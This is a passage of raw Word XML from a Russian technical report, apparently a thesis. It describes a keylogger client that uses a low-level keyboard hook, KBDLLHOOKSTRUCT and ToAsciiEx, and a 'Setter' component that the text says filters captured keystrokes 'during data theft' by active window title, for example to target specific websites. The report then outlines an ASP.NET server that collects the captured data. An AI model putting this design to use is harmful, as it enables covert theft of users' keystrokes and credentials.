          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> DWORD time;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ULONG_PTR dwExtraInfo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00896B7B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896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">де </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>важны</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> только 2 параметра: </w:t>
      </w:r>
      <w:r w:rsidR="004E1687" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vkCode (</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>виртуальный код) и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scanCode нажатой клавиши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vkCode – виртуальный код клавиши (от 1 до 254)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>scanCode – hardware скан-код клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5133" w:rsidRDefault="00896B7B" w:rsidP="00910C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того, </w:t>
      </w:r>
      <w:r w:rsidR="005E1D84">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тобы </w:t>
      </w:r>
      <w:r w:rsidR="005E1D84" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>транслировать</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> виртуальный код клавиши в читаемый</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>символ</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, потребуется функция ToAsciiEx </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истинг</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRPr="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00451CAA">
      <w:pPr>
        <w:pStyle w:val="a7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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>int WINAPI ToAsciiEx(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ UINT uVirtKey,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ UINT uScanCode,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_opt_ const BYTE *lpKeyState,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _Out_ LPWORD lpChar,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ UINT uFlags,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_opt_ HKL dwhkl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00896B7B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где:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uVirtKey — </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>виртуальный</w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клавиши</w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="005E1D84" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr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uScanCode </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> скан коды клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lpKeyState — состояние клавиатуры, проверяет какие клавиши</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA" w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нажаты/активны (можно определить нажатый CapsLock)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lpChar — указатель на двойное слово, в которое функция запишет</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA" w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>символьное представление клавиши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00451CAA" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uFlags — параметр, указывающий на активность меню(ALT).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E24EB" w:rsidRPr="006A447A" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dwhkl — (опциональный) идентификатор раскладки клавиатуры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A447A" w:rsidRPr="006A447A" w:rsidRDefault="006A447A" w:rsidP="006A447A">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> производит фильтрацию при краже данных. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> получает дескриптор активного окна при помощи функции </w:t>
      </w:r>
      <w:r w:rsidRPr="006A447A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetForegroundWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, получает заглавие (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) активного окна (функция </w:t>
      </w:r>
      <w:r w:rsidRPr="006A447A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetWindowText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), тем самым фильтрует процесс с которого будет производится захват нажатий клавиатуры и заглавие активного окна процесса. </w:t>
      </w:r>
      <w:r w:rsidR="00CD1BAD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Например,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> если мы производит захват с процесса браузера, то по заглавию окна можно отфильтровать</w:t>
      </w:r>
      <w:r w:rsidR="00CD1BAD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> конкретные сайты с уникальными заглавиями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14F90" w:rsidRDefault="00F14F90">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left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DA7DAD" w:rsidRDefault="00DA7DAD" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc4724262"/>
      <w:r w:rsidRPr="00843683">
        <w:lastRenderedPageBreak/>
        <w:t>Разработка сервера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00DA7DAD" w:rsidRPr="00843683" w:rsidRDefault="00DA7DAD" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc531587656"/>
      <w:bookmarkStart w:id="24" w:name="_Toc4724263"/>
      <w:r>
        <w:t xml:space="preserve">Программная </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44F46">
        <w:t>платформа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> серверного приложения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="006711AD" w:rsidRDefault="006711AD" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Для разработки серверного приложения была выбрана</w:t>
      </w:r>
      <w:r w:rsidR="00C74C54">
        <w:t xml:space="preserve"> программная среда ASP .NET</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001227A2" w:rsidRDefault="00DA7DAD" w:rsidP="006859F6">
      <w:r w:rsidRPr="001227A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ASP .NET Core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="006859F6" w:rsidRPr="006859F6">
        <w:t>платформа разработки веб-приложений, в состав которой входит: веб-сервисы, программная инфраструктура, модель программирования[1], от компании Майкрософт. ASP.NET входит в со</w:t>
      </w:r>
      <w:r w:rsidR="006859F6">
        <w:t>став платформы .NET Framework</w:t>
      </w:r>
      <w:r w:rsidR="006859F6" w:rsidRPr="006859F6">
        <w:t xml:space="preserve"> и является развитием более старой технологии Microsoft ASP</w:t>
      </w:r>
      <w:r w:rsidR="006859F6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006859F6" w:rsidRDefault="006859F6" w:rsidP="006859F6">
      <w:r w:rsidRPr="006859F6">
        <w:t>ASP.NET внешне во многом сохраняет схожесть с более старой технологией ASP, что позволяет разработчикам относительно легко перейти на ASP.NET. В то же время внутреннее устройство ASP.NET существенно отличается от ASP, поскольку она основана на платформе .NET и, следовательно, использует все новые возможности, предоставляемые этой платформой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8497E" w:rsidRDefault="00A8497E" w:rsidP="006859F6">
      <w:r>
        <w:t xml:space="preserve">Для управления БД был выбран </w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADO</w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00846203" w:rsidRPr="00846203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8497E">
        <w:t xml:space="preserve">6.0. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00846203" w:rsidRDefault="00846203" w:rsidP="006859F6">
      <w:r w:rsidRPr="00B104B6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ADO.NET Entity Framework (EF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00846203">
        <w:t xml:space="preserve"> — объектно-ориентированная технология доступа к данным, является object-relational mapping (ORM) решением для .NET Framework от Microsoft. Предоставляет возможность взаимодействия с объектами как посредством LINQ в виде LINQ to Entities, так и с использованием Entity SQL. Для облегчения построения web-решений используется как ADO.NET Data Services (Astoria), так и связка из Windows Communication Foundation и Windows Presentation Foundation, позволяющая строить многоуровневые приложения, реализуя один из шаблонов проектирования MVC, MVP или MVVM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854897" w:rsidRDefault="00854897" w:rsidP="00854897">
      <w:r>
        <w:t xml:space="preserve">Для принятия сообщений от клиента используется технология </w:t>
      </w:r>
      <w:r w:rsidRPr="00854897">
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00854897">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00854897">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455139">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ASP.NET Web API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - это инфраструктура для создания HTTP-сервисов, доступ к которым можно получить с любого клиента, включая браузеры и мобильные устройства. Это идеальная платформа для создания приложений RESTful на .NET Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854897" w:rsidRDefault="00CA6914" w:rsidP="00CA6914">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc4724264"/>
      <w:r w:rsidRPr="00A44F46">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Реализация </w:t>
      </w:r>
      <w:r>
        <w:t>серверного</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44F46">
        <w:t xml:space="preserve"> приложения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00DA2E89" w:rsidRPr="006C60B1" w:rsidRDefault="00C51F69" w:rsidP="00CA691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Серверное приложения имеет </w:t>
      </w:r>
      <w:r w:rsidR="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">монолитную архитектуру, подходящую для проектов, </w:t>
      </w:r>
      <w:r w:rsidR="00CA6914" w:rsidRPr="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>содерж</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ащ</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914" w:rsidRPr="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914" w:rsidRPr="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> довольно</w:t>
      </w:r>
      <w:r w:rsidR="0097483F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> простой и небольшой функционал. М</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914" w:rsidRPr="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>онолитная архитектура</w:t>
      </w:r>
      <w:r w:rsidR="0097483F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00CA6914" w:rsidRPr="00CA6914">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть цельное приложение без разделения на уровни в данном случае вполне подходит, также как он подходит для простых реализаций CRUD-интерфейсов</w:t>
      </w:r>
      <w:r w:rsidR="0097483F">
